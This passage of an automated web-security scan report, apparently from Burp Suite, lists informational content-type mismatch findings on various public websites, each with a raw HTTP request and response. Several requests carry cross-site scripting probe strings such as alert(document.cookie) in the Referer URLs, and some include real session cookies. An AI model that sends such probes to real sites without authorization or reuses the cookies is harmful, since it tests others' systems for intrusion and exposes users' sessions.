// Provide a default path to dwr.engine
if (dwr == null) var dwr = {};
if (dwr.engine == null) dwr.engine = {};
if (DWREngine == null) var DWREngine = dwr.engine;

if (MarketManager == null) var Mark
...[SNIP]...

32.82. http://www.autotraderstatic.com/dwr/interface/ModelSearchUtil.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.autotraderstatic.com
Path:   /dwr/interface/ModelSearchUtil.js

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/plain;charset=ISO-8859-1
The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /dwr/interface/ModelSearchUtil.js?v=3.17.167500 HTTP/1.1
Host: www.autotraderstatic.com
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: M7F1=CT

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sat, 01 Jan 2011 21:11:55 GMT
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/plain;charset=ISO-8859-1
Cache-Control: max-age=271979
Date: Tue, 25 Jan 2011 02:19:41 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 8644


// Provide a default path to dwr.engine
if (dwr == null) var dwr = {};
if (dwr.engine == null) dwr.engine = {};
if (DWREngine == null) var DWREngine = dwr.engine;

if (ModelSearchUtil == null) var Mo
...[SNIP]...

32.83. http://www.autotraderstatic.com/dwr/interface/UserMsgController.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.autotraderstatic.com
Path:   /dwr/interface/UserMsgController.js

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/plain;charset=ISO-8859-1
The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /dwr/interface/UserMsgController.js HTTP/1.1
Host: www.autotraderstatic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: M7F1=CT;

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 07 Dec 2010 18:47:16 GMT
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/plain;charset=ISO-8859-1
Cache-Control: max-age=449748
Date: Tue, 25 Jan 2011 14:23:53 GMT
Content-Length: 1986
Connection: close


// Provide a default path to dwr.engine
if (dwr == null) var dwr = {};
if (dwr.engine == null) dwr.engine = {};
if (DWREngine == null) var DWREngine = dwr.engine;

if (UserMsgController == null) var
...[SNIP]...

32.84. http://www.autotraderstatic.com/inc/js/Tabber.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.autotraderstatic.com
Path:   /inc/js/Tabber.js

Issue detail

The response contains the following Content-type statement:
  • Content-Type: application/x-javascript
The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /inc/js/Tabber.js?v=3.17.167500 HTTP/1.1
Host: www.autotraderstatic.com
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: M7F1=CT

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 02 Nov 2010 16:44:20 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Cache-Control: max-age=255664
Expires: Fri, 28 Jan 2011 01:20:45 GMT
Date: Tue, 25 Jan 2011 02:19:41 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 5517

if((typeof Prototype=='undefined') ||
(typeof Element == 'undefined') ||
(typeof Element.Methods=='undefined') ||
parseFloat(Prototype.Version.split(".")[0] + "." +
Protot
...[SNIP]...

32.85. http://www.autotraderstatic.com/inc/js/UltraPop.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.autotraderstatic.com
Path:   /inc/js/UltraPop.js

Issue detail

The response contains the following Content-type statement:
  • Content-Type: application/x-javascript
The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /inc/js/UltraPop.js?v=3.17.167500 HTTP/1.1
Host: www.autotraderstatic.com
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: M7F1=CT

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 25 Nov 2010 06:00:52 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Cache-Control: max-age=234501
Expires: Thu, 27 Jan 2011 19:28:02 GMT
Date: Tue, 25 Jan 2011 02:19:41 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 7696

if((typeof Prototype=='undefined') ||
(typeof Element == 'undefined') ||
(typeof Element.Methods=='undefined') ||
parseFloat(Prototype.Version.split(".")[0] + "." +
Prototyp
...[SNIP]...

32.86. http://www.beirut.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/plain; charset=UTF-8
The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.beirut.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:13:21 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 06 Sep 2010 13:16:19 GMT
ETag: "cf002a-47e-48f9716036ec0"
Accept-Ranges: bytes
Cache-Control: max-age=172800
Expires: Thu, 27 Jan 2011 02:13:21 GMT
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
Content-Length: 1150

............ .h.......(....... ..... .................................................................................................x...{.....^...a..Z...[..qP..mN..Mg..Br..D...V......H............F.
...[SNIP]...

32.87. http://www.cloudaccess.net/templates/rt_quasar_j15/css/vegur-m_0600-webfont.woff

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.cloudaccess.net
Path:   /templates/rt_quasar_j15/css/vegur-m_0600-webfont.woff

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/plain; charset=UTF-8
The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /templates/rt_quasar_j15/css/vegur-m_0600-webfont.woff HTTP/1.1
Host: www.cloudaccess.net
Proxy-Connection: keep-alive
Referer: http://www.cloudaccess.net/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:05 GMT
Server: Apache/2.2.17 (CentOS)
Last-Modified: Tue, 13 Jul 2010 12:12:20 GMT
ETag: "a8e1f-34fc-48b43c7eb5100"
Accept-Ranges: bytes
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
Content-Length: 13564

wOFF......4.......R.........................FFTM............W.>.GDEF........... ....GPOS...............7GSUB....... ... l.t.OS/2.......K...`..^.cmap...X.......z..4.cvt .......(...(.F.2fpgm...@.......e
...[SNIP]...

32.88. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/html; charset=utf-8
The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /extern/login_status.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dla2day.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.la2day.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Date: Mon, 24 Jan 2011 16:05:02 GMT
Content-Length: 22

Invalid Application ID

32.89. http://www.foxaudiencenetwork.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.foxaudiencenetwork.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/plain; charset=UTF-8
The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.foxaudiencenetwork.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:10:45 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 11 Nov 2010 20:55:05 GMT
ETag: "4a8185-47e-494cd30379c40"
Accept-Ranges: bytes
Content-Length: 1150
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
nnCoection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ...................................r..h7..m>....u...................................U........._+..G...G...G...G...U....................................U..y..G...G
...[SNIP]...

32.90. http://www.google.com/mbd

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.google.com
Path:   /mbd

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/html; charset=UTF-8
The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /mbd?q=aub+assemble+usenet+binary&hl=en&prmd=ivns&mbtype=29&resnum=1&tbo=1&docid=17749270341949851663&usg=4a1f&zx=1295880902226 HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Date: Mon, 24 Jan 2011 14:54:27 GMT
Expires: -1
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 5967

google.Toolbelt.ascrs('.tbo #ssb #tbp{background-position:-105px -74px}.tbt{margin-bottom:1.2em;font-size:82%}.tbos{padding-top:2px;font-weight:bold}.tbou{padding-top:2px;padding-left:1em}.tbotu{color
...[SNIP]...

32.91. http://www.google.com/recaptcha/api/reload

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.google.com
Path:   /recaptcha/api/reload

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/javascript
The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /recaptcha/api/reload?c=03AHJ_VuvSi9ENrnQA2xmcnrhBlqWRQ6MFeaYPJ7nddgl29pJbumqg3KRxiCERqMvgM9G1o9cBf5y24cS-WijOHquhw42I93JgwhIQYQ87sAos5oSf8JsAmt7b3WM_1KqlOsDqlzo_0gA0nHb1IUrbpcRxMb7WEY9iiQ&k=6LcvxgsAAAAAAO9JQTOglTvq6Ycqs2EM7mgFLyiB&reason=t&type=image&lang=en HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://demo.joomla.org/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Date: Mon, 24 Jan 2011 07:16:30 GMT
Content-Type: text/javascript
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 201

Recaptcha.finish_reload('03AHJ_VussAUzzkp_SC3CMdlMGqAGizLmn2Oe6RDe575sf6STXC9cLql3o2_sCsgnGld3M2kk2xdKHIrqYSaIyo4CXI_263YSqYYdm-nXOz9LHdtW_CCH1a1TyfpmPM0jk7hXopd_oFInWDi296bN_BF3hpII4dRkU7Q', 'image')
...[SNIP]...

32.92. http://www.kbsp.com/x/fonts/AKZIGBEM.TTF

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.kbsp.com
Path:   /x/fonts/AKZIGBEM.TTF

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/plain
The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /x/fonts/AKZIGBEM.TTF HTTP/1.1
Host: www.kbsp.com
Proxy-Connection: keep-alive
Referer: http://www.kbsp.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:05:18 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6 mod_ssl/2.2.9 OpenSSL/0.9.7l DAV/2 mod_jk/1.2.23 mod_fastcgi/2.4.2 mod_scgi_pubsub/1.11-pubsub mod_perl/2.0.2 Perl/v5.8.8
Last-Modified: Wed, 20 Oct 2010 16:42:17 GMT
ETag: "97914-c1cc-4930f17a00c40"
Accept-Ranges: bytes
Content-Length: 49612
Cache-Control: max-age=60
Expires: Mon, 24 Jan 2011 22:06:18 GMT
MS-Author-Via: DAV
Connection: close
Content-Type: text/plain

............GPOS...q........GSUBy......t...xOS/2l    ~........`VDMXo.w.........cmap.@{........2cvt ...........$fpgm2Msf..
....bgasp...    ........glyf...    .......Dhead..m|.......6hhea.).....T...$hmtx.V "....
...[SNIP]...

32.93. http://www.kbsp.com/x/fonts/AKZIGBES.TTF

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.kbsp.com
Path:   /x/fonts/AKZIGBES.TTF

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/plain
The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /x/fonts/AKZIGBES.TTF HTTP/1.1
Host: www.kbsp.com
Proxy-Connection: keep-alive
Referer: http://www.kbsp.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:05:18 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6 mod_ssl/2.2.9 OpenSSL/0.9.7l DAV/2 mod_jk/1.2.23 mod_fastcgi/2.4.2 mod_scgi_pubsub/1.11-pubsub mod_perl/2.0.2 Perl/v5.8.8
Last-Modified: Wed, 20 Oct 2010 17:04:42 GMT
ETag: "97916-c528-4930f67cb1e80"
Accept-Ranges: bytes
Content-Length: 50472
Cache-Control: max-age=60
Expires: Mon, 24 Jan 2011 22:06:18 GMT
MS-Author-Via: DAV
Connection: close
Content-Type: text/plain

............GPOS...q...0....GSUBy..........xOS/2ms}>.......`VDMXm.u....H....cmap.@{........2cvt ..
i.......&fpgm2Msf..
....bgasp...    ... ....glyfC..]........head..lo.......6hhea...'...T...$hmtx.e.0....
...[SNIP]...

32.94. http://www.lithuanianjoomla.com/media/system/js/mootools-more.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.lithuanianjoomla.com
Path:   /media/system/js/mootools-more.js

Issue detail

The response contains the following Content-type statement:
  • Content-Type: application/javascript
The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /media/system/js/mootools-more.js HTTP/1.1
Host: www.lithuanianjoomla.com
Proxy-Connection: keep-alive
Referer: http://www.lithuanianjoomla.com/7-joomla-naujienosc1471%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e4fb583d3360/70-joomla-160-isleista.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:00 GMT
Server: Apache
Last-Modified: Mon, 10 Jan 2011 15:32:50 GMT
ETag: "31195df-5244c-4d2b26a2"
Accept-Ranges: bytes
Content-Type: application/javascript
Content-Length: 336972

// MooTools: the javascript framework.
// Load this file's selection again by visiting: http://mootools.net/more/f04c978bcdfd762ce3cc0d21a61c819d
// Or build this file again with packager using: pack
...[SNIP]...

32.95. http://www.masjo.com/wp-content/plugins/archieve/images/913e4_new_script_host-39261-1228323711.jpeg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.masjo.com
Path:   /wp-content/plugins/archieve/images/913e4_new_script_host-39261-1228323711.jpeg

Issue detail

The response contains the following Content-type statement:
  • Content-Type: image/jpeg
The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /wp-content/plugins/archieve/images/913e4_new_script_host-39261-1228323711.jpeg HTTP/1.1
Host: www.masjo.com
Proxy-Connection: keep-alive
Referer: http://www.masjo.com/search/learn+typing+quick+and+easy+cracka074f%3Cscript%3Ealert(document.cookie)%3C/script%3Ec4a5acfda9b/page/419/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:03:49 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/4.4.9 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Tue, 23 Nov 2010 11:25:06 GMT
ETag: "128ce01-991-495b69fe4c880"
Accept-Ranges: bytes
Content-Length: 2449
Content-Type: image/jpeg

GIF87a..x.............(((...UUU......            iii........u.K....*.,......x......I..8....`8..h.h..[0.p,.tm.,QL.....N0@....Q. ../.tzR ..@.....W...P...q P@.....S.....``..~.    ;..eB.ps...^..=`kbJ%Zz......q..>..D
...[SNIP]...

32.96. https://www.mytraderonline.com/css/promoCSS.php

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.mytraderonline.com
Path:   /css/promoCSS.php

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /css/promoCSS.php HTTP/1.1
Host: www.mytraderonline.com
Connection: keep-alive
Referer: https://www.mytraderonline.com/myt8ac25%3Cscript%3Ealert(document.cookie)%3C/script%3E9d5249ed1b2/sign-in/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1295921266915%7C1298513266915%3B%20s_lv%3D1295921266917%7C1390529266917%3B%20s_lv_s%3DFirst%2520Visit%7C1295923066917%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:07:55 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13 mod_ssl/2.0.63 OpenSSL/0.9.8l
X-Powered-By: PHP/5.2.13
Content-Length: 4589
Connection: close
Content-Type: text/html


/***********************
   PROMOS
***********************/
.smlPromo3 {width: 249px; height: 293px;border: solid 1px #a2a2a2;background: url('/img/tol-designtol/gradient-179px-tile.jpg?') 0 0 repeat-
...[SNIP]...

32.97. https://www.mytraderonline.com/css/tolhomecss.php

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.mytraderonline.com
Path:   /css/tolhomecss.php

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /css/tolhomecss.php HTTP/1.1
Host: www.mytraderonline.com
Connection: keep-alive
Referer: https://www.mytraderonline.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1295921299027%7C1298513299027%3B%20s_lv%3D1295921299028%7C1390529299028%3B%20s_lv_s%3DFirst%2520Visit%7C1295923099028%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:29:26 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13 mod_ssl/2.0.63 OpenSSL/0.9.8l
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 8747

/******************
INDEX
*******************/
#idxTop{float:left;width:399px;margin-bottom:0;}
#idxBot{float:left;width:556px;border-left:2px #a2a2a2 solid;margin-bottom:0;}
#tileLftTp,#tileRtT
...[SNIP]...

32.98. https://www.mytraderonline.com/javascript/master_s_code.js

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.mytraderonline.com
Path:   /javascript/master_s_code.js

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /javascript/master_s_code.js HTTP/1.1
Host: www.mytraderonline.com
Connection: keep-alive
Referer: https://www.mytraderonline.com/myt8ac25%3Cscript%3Ealert(document.cookie)%3C/script%3E9d5249ed1b2/sign-in/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:07:43 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13 mod_ssl/2.0.63 OpenSSL/0.9.8l
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 32370

/**************************
flicker
***************************/
try {
document.execCommand('BackgroundImageCache', false, true);
} catch(e) {}


function tourWndw() {
    var imtTour=wind
...[SNIP]...

32.99. https://www.mytraderonline.com/javascript/realmedia.js

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.mytraderonline.com
Path:   /javascript/realmedia.js

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /javascript/realmedia.js HTTP/1.1
Host: www.mytraderonline.com
Connection: keep-alive
Referer: https://www.mytraderonline.com/myt8ac25%3Cscript%3Ealert(document.cookie)%3C/script%3E9d5249ed1b2/sign-in/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:07:45 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13 mod_ssl/2.0.63 OpenSSL/0.9.8l
X-Powered-By: PHP/5.2.13
Content-Length: 2571
Connection: close
Content-Type: text/html


   // Instantiate the real media variables
   var oas='https://oasc05.247realmedia.com/RealMedia/ads/';
   var RN = new String (Math.random());
   var RNS = RN.substring (2,11);
   var _version = 40;

   // Fun
...[SNIP]...

32.100. http://www.netlingo.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.netlingo.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/plain
The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.netlingo.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:01:56 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 17 Mar 2009 15:51:51 GMT
ETag: "3684ad-4486-8b9eb3c0"
Accept-Ranges: bytes
Content-Length: 17542
Connection: close
Content-Type: text/plain

......00.... ..%..F... .... ......%........ ..    ...6........ .h....@..(...0...`..... ......%............................................................................................................
...[SNIP]...

32.101. http://www.newsreaders.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.newsreaders.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/plain
The response states that it contains plain text. However, it actually appears to contain a GIF image.

Request

GET /favicon.ico HTTP/1.1
Host: www.newsreaders.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

